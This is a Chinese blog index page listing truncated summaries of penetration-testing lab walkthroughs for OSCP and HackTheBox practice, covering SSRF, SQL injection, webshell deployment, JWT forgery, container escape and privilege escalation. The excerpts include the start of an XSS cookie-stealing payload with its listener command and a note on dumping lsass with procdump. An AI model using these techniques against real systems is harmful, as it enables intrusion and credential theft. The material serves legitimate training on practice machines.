摘要:
有一段时间没发了,把准备oscp打的靶机walkthrough都放到gitee了,后面有更新也会直接放那边,就不 单独每篇发博客了。 gitee仓库地址:hackthebox_oscp 阅读全文
posted @ 2022-05-17 20:42
wuerror
阅读(27)
评论(0)
推荐(0)
摘要:
ssrf与信息泄露 阅读全文
posted @ 2021-09-17 17:01
wuerror
阅读(454)
评论(0)
推荐(0)
摘要:
sql注入读文件,代码审计出文件名命令注入 阅读全文
posted @ 2021-09-17 09:50
wuerror
阅读(541)
评论(0)
推荐(0)
摘要:
git历史commit泄露密码,tomcat后台部署webshell,ansible playbook执行命令 阅读全文
posted @ 2021-09-11 17:29
wuerror
阅读(452)
评论(0)
推荐(0)
摘要:
前言 记录一些打靶机过程中修改的脚本。 xss-cookie-stealer python3版本,就是一个服务端,实时输出访问日志(弹回来的cookie) python3 xss-cookie-stealer.py |tee log.txt 原仓库 使用方法 式例如下 <img src=x oner 阅读全文
posted @ 2021-07-11 18:33
wuerror
阅读(65)
评论(0)
推荐(0)
摘要:
oscp考试中涉及到的缓冲区溢出一般流程,与实际练习。 阅读全文
posted @ 2021-07-04 18:07
wuerror
阅读(1248)
评论(1)
推荐(1)
摘要:
jwt token伪造,容器逃逸 阅读全文
posted @ 2021-06-27 18:04
wuerror
阅读(209)
评论(0)
推荐(0)
摘要:
druppal geddon2 RCE,snap本地提权 阅读全文
posted @ 2021-06-14 15:38
wuerror
阅读(237)
评论(0)
推荐(0)
摘要:
信息泄露,wordpress后台getshell, suid提权。PHP/8.1.0-dev后门 阅读全文
posted @ 2021-06-06 16:53
wuerror
阅读(216)
评论(0)
推荐(0)
摘要:
端口扫描 nmap -sV -v -A ip nmap -sU ip #udp扫描,一般用不着,没思路了可以试试 windows权限检查 windows-privesc-check2.exe --audit -a -o wpc-report windows域相关 导出lsass procdump64 阅读全文
posted @ 2021-06-05 11:19
wuerror
阅读(247)
评论(0)
推荐(0)
浙公网安备 33010602011771号